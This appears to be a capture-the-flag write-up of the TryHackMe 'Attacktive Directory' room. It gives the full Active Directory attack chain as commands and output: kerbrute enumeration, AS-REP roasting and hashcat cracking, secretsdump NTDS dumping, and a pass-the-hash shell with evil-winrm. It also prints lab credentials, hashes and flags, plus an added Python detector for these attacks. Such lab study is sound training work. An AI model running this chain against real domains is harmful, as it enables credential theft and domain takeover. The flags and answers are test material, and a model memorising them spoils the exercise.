Microsoft Active Directory can be found at almost every medium or large organization (99% according to the THM room), which is why it is a common target for black hats and other malicious actors. In the Attacktive Directory room we can learn a lot about targeting the services in an AD.
I use the THM in-browser Kali Linux for this task!
Task 1: Deploy The Machine
Connect to the THM network with OpenVPN or use the Attack Box / Kali Linux.
Task 2: Setup
If we don’t use the Attack Box / THM Kali Linux then we have to follow the installation steps: install Impacket, Bloodhound and Neo4j.
Task 3: Welcome to Attacktive Directory
We will use the nmap and enum4linux tools to answer the questions.
Let’s run nmap and check the services on the Domain Controller!
┌──(root㉿kali)-[~]
└─# nmap -A -T5 <WIN_DC_IP>
The results help us to answer the questions.
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| Product_Version: 10.0.17763
What tool will allow us to enumerate port 139/445?
enum4linux
What is the NetBIOS-Domain Name of the machine?
THM-AD
What invalid TLD do people commonly use for their Active Directory Domain?
.local
Task 4: Enumerating Users via Kerberos
Before we start the enumeration we have to use wget to download the kerbrute utility and the userlist.txt and passwordlist.txt files from the task. At the time of writing this article the following URLs were valid:
wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt
When we are ready we can run the enumeration. Let’s use the ./kerbrute -h command to check the help of the tool. We can answer a question by looking at the output:
What command within Kerbrute will allow us to enumerate valid usernames?
userenum
Now we can parameterize and run the command to enumerate the users.
┌──(root㉿kali)-[~]
└─# ./kerbrute userenum -d spookysec.local --dc <WIN_DC_IP> userlist.txt
Looking at the user list we see some interesting service account results: svc-admin@spookysec.local, backup@spookysec.local
The next questions can be answered with this information, though they did not jump out at us that hard.
What notable account is discovered? (These should jump out at you)
svc-admin
What other notable account is discovered? (These should jump out at you)
backup
Task 5: Abusing Kerberos
We will use the Impacket tool for this task. I had to look it up on the Kali Box.
┌──(root㉿kali)-[~]
└─# find / -name GetNPUsers.py
/usr/share/doc/python3-impacket/examples/GetNPUsers.py
Let’s check the help text of the tool by providing the -h option to the command.
/usr/share/doc/python3-impacket/examples/GetNPUsers.py -h
Now we can run the following command:
┌──(root㉿kali)-[~]
└─# /usr/share/doc/python3-impacket/examples/GetNPUsers.py -no-pass -dc-ip 10.10.80.53 spookysec.local/svc-admin
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Getting TGT for svc-admin
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:e51902b5f819fe04fd84a4247947031d$ac6f48066520a321ef9a0cb75739a9858e3e52c7faf4ec74ebb8469adc50c0fd0de6586fafb83bd24a36578d62358ec19f8ab03db497ee237abfac902ebe15991d4133c855cad4797c799a08178653f686760cc9a0666366c19a4921a6fa464c04425cb91607c9153fe399abefa16c4d42b7fa569d1ee4f9b6923909f52c2e9da1de090db3cf01b426274f776d9126d14d48fb49b1cb74cb4fb21766ba871bfa26dc90e7660d3599bc697bf6750e8f1ecc1635aef31d1c02cde4ee2c3c1473ff549bf5424da1b5ea79099f46e08a629b1fab9e0ea6bcfd7918b0f458f0530b6f8353fe80457df37f6aff860037d565e6c482
Let’s answer the first question.
We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
svc-admin
For the next question, copy the first part of the Kerberos hash; we will look it up in the hashcat examples.
$krb5asrep$23$
Open a browser and search for the hashcat examples, then look for that string we have copied before.
Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
Kerberos 5, etype 23, AS-REP
Let’s save the hash to a text file and run hashcat on it.
┌──(root㉿kali)-[~]
└─# hashcat hash.txt passwordlist.txt
From the command output we will be able to answer a question.
What mode is the hash?
18200
Now we can see the cracked password using the --show option of hashcat.
┌──(root㉿kali)-[~]
└─# hashcat --show hash.txt
Now crack the hash with the modified password list provided, what is the user accounts password?
management2005
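To see how the activity in Task 4 and Task 5 looks from the domain controller's side, here is an added Python example (my own, not part of the room, of kerbrute or of Impacket). It parses a hash in the $krb5asrep$23$... layout printed above into its fields, and runs two checks over a constructed set of Windows Security Event 4768 (Kerberos TGT request) records: a burst of KDC_ERR_C_PRINCIPAL_UNKNOWN (0x6) failures for distinct usernames from one client, which is what kerbrute userenum produces, and a TGT issued with Pre-Authentication Type 0 and RC4 (0x17), which is what GetNPUsers.py asks the KDC for. The event records, the guessed account names, the client IPs and the hex in the sample hash are all constructed for the example; the field names follow the 4768 event schema.

```python
import re
from collections import defaultdict

# hashcat mode this page identifies for "Kerberos 5, etype 23, AS-REP"
HASHCAT_MODE_ASREP_RC4 = 18200

# Layout GetNPUsers.py prints: $krb5asrep$<etype>$<user>@<REALM>:<checksum>$<enc-part>
_ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@$:]+)@(?P<realm>[^:$]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<cipher>[0-9a-fA-F]+)$"
)

# Constructed stand-in for the real hash on the page: same layout, made-up hex.
SAMPLE_ASREP_HASH = "$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:" + "ab" * 16 + "$" + "cd" * 40


def parse_asrep_hash(line):
    """Split a hashcat-format AS-REP hash into its parts, or return None.

    For etype 23 (RC4-HMAC) the first hex field is the 16-byte HMAC-MD5
    checksum of the plaintext and the second is the RC4-encrypted part of
    the AS-REP. hashcat derives the RC4-HMAC key from each candidate
    password's NT hash, decrypts, and compares the checksum, which is why
    the ticket can be cracked offline without touching the KDC again.
    """
    m = _ASREP_RE.match(line.strip())
    if not m:
        return None
    parts = m.groupdict()
    parts["etype"] = int(parts["etype"])
    parts["hashcat_mode"] = HASHCAT_MODE_ASREP_RC4 if parts["etype"] == 23 else None
    return parts


# Constructed Security Event 4768 records reduced to the fields the checks use.
# Field names follow the 4768 schema; accounts, IPs and order are made up.
SAMPLE_4768 = [
    {"TargetUserName": "guess-01", "IpAddress": "10.10.14.7", "Status": "0x6", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    {"TargetUserName": "guess-02", "IpAddress": "10.10.14.7", "Status": "0x6", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    {"TargetUserName": "guess-03", "IpAddress": "10.10.14.7", "Status": "0x6", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    {"TargetUserName": "guess-04", "IpAddress": "10.10.14.7", "Status": "0x6", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    {"TargetUserName": "guess-05", "IpAddress": "10.10.14.7", "Status": "0x6", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    # TGT issued without pre-authentication, RC4: the AS-REP roasting pattern
    {"TargetUserName": "svc-admin", "IpAddress": "10.10.14.7", "Status": "0x0", "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    # Ordinary logon: PA-ENC-TIMESTAMP pre-authentication (type 2), AES256 (0x12)
    {"TargetUserName": "alice", "IpAddress": "10.10.20.5", "Status": "0x0", "PreAuthType": "2", "TicketEncryptionType": "0x12"},
    # A single mistyped username from another client: below the burst threshold
    {"TargetUserName": "bob", "IpAddress": "10.10.20.6", "Status": "0x6", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
]


def detect_asrep_roasting(events):
    """Return TGTs issued with no pre-authentication (PreAuthType 0).

    Windows clients always pre-authenticate (most commonly type 2), so a
    successful 4768 with type 0 means an account flagged DONT_REQ_PREAUTH
    was asked for a ticket the way GetNPUsers.py does. RC4 (0x17) on that
    ticket is the second half of the signature.
    """
    hits = []
    for ev in events:
        if ev["Status"] == "0x0" and ev["PreAuthType"] == "0":
            hits.append({
                "user": ev["TargetUserName"],
                "client": ev["IpAddress"],
                "rc4": ev["TicketEncryptionType"].lower() == "0x17",
            })
    return hits


def detect_user_enumeration(events, threshold=5):
    """Return client IPs that requested TGTs for >= threshold unknown principals.

    kerbrute userenum produces one KDC_ERR_C_PRINCIPAL_UNKNOWN (0x6) failure
    per guessed name, all from the same source, in a short burst.
    """
    unknown = defaultdict(set)
    for ev in events:
        if ev["Status"] == "0x6":
            unknown[ev["IpAddress"]].add(ev["TargetUserName"])
    return {ip: len(names) for ip, names in unknown.items() if len(names) >= threshold}


if __name__ == "__main__":
    print(parse_asrep_hash(SAMPLE_ASREP_HASH))
    for hit in detect_asrep_roasting(SAMPLE_4768):
        print("AS-REP roasting candidate:", hit)
    for ip, n in detect_user_enumeration(SAMPLE_4768).items():
        print(f"username enumeration from {ip}: {n} unknown principals")
```

The two 4768 checks are the usual mitigations' other half: the fix for the roasting finding is to clear "Do not require Kerberos preauthentication" on the account (or give it a long random password and AES-only encryption types), and the enumeration burst is visible because the KDC answers differently for unknown and known principals, which no configuration hides.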
Task 6: Back to the Basics
Now we have a valid credential to a domain user, so we can enumerate the shares. Remember: svc-admin has the password management2005!
A basic tool we can use for share enumeration is the smbclient. Let’s have a look!
┌──(root㉿kali)-[~]
└─# smbclient --list 10.10.80.53 --user spookysec.local/svc-admin%management2005
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.80.53 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
What utility can we use to map remote SMB shares?
smbclient
Which option will list shares?
-L
How many remote shares is the server listing?
6
There is one particular share that we have access to that contains a text file. Which share is it?
backup
┌──(root㉿kali)-[~]
└─# smbclient \\\\spookysec.local\\backup --user svc-admin%management2005
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Apr 4 19:08:39 2020
.. D 0 Sat Apr 4 19:08:39 2020
backup_credentials.txt A 48 Sat Apr 4 19:08:53 2020
8247551 blocks of size 4096. 3802964 blocks available
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
What is the content of the file?
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
┌──(root㉿kali)-[~]
└─# base64 -d backup_credentials.txt
backup@spookysec.local:backup2517860
Decoding the contents of the file, what is the full contents?
backup@spookysec.local:backup2517860
Task 7: Elevating Privileges within the Domain
Now we know the credentials of two different users, so we have a good chance of escalating privileges.
| User | Password |
| --- | --- |
| svc-admin | management2005 |
| backup | backup2517860 |
The task instructs us to use another tool called secretsdump.py, so let’s look for it on our Linux box.
┌──(root㉿kali)-[~]
└─# find / -name secretsdump.py 2>/dev/null
/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py
/usr/share/doc/python3-impacket/examples/secretsdump.py
/usr/share/responder/tools/MultiRelay/impacket-dev/impacket/examples/secretsdump.py
/usr/share/responder/tools/MultiRelay/impacket-dev/secretsdump.py
/usr/share/metasploit-framework/modules/auxiliary/scanner/smb/impacket/secretsdump.py
After reading the help text of the tool we can run the command with the proper options. I just added the spookysec.local domain to my /etc/hosts file here.
┌──(root㉿kali)-[~]
└─# /usr/share/doc/python3-impacket/examples/secretsdump.py spookysec.local/backup:backup2517860@spookysec.local
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
(...)
Now we can answer the following questions:
What method allowed us to dump NTDS.DIT?
DRSUAPI
What is the Administrators NTLM hash?
0e0363213e37b94221497260b0bcb4fc
At this point we can run a “pass the hash” attack, which is the answer to the next question.
What method of attack could allow us to authenticate as the user without the password?
pass the hash
Using a tool called Evil-WinRM what option will allow us to use a hash?
-H
Task 8: Flag Submission Panel
Let’s hit that system hard now and use evil-winrm for a remote console!
┌──(root㉿kali)-[~]
└─# evil-winrm -H 0e0363213e37b94221497260b0bcb4fc -i spookysec.local -u Administrator
With the evil-winrm command we got an Administrator shell on the target system. From this point we have to visit the users and find their flags.
svc-admin
TryHackMe{K3rb3r0s_Pr3_4uth}
backup
TryHackMe{B4ckM3UpSc0tty!}
Administrator
TryHackMe{4ctiveD1rectoryM4st3r}
We’re done with this room! Congratulations!
If you have anything to share then please visit my Tom’s IT Cafe Discord Server!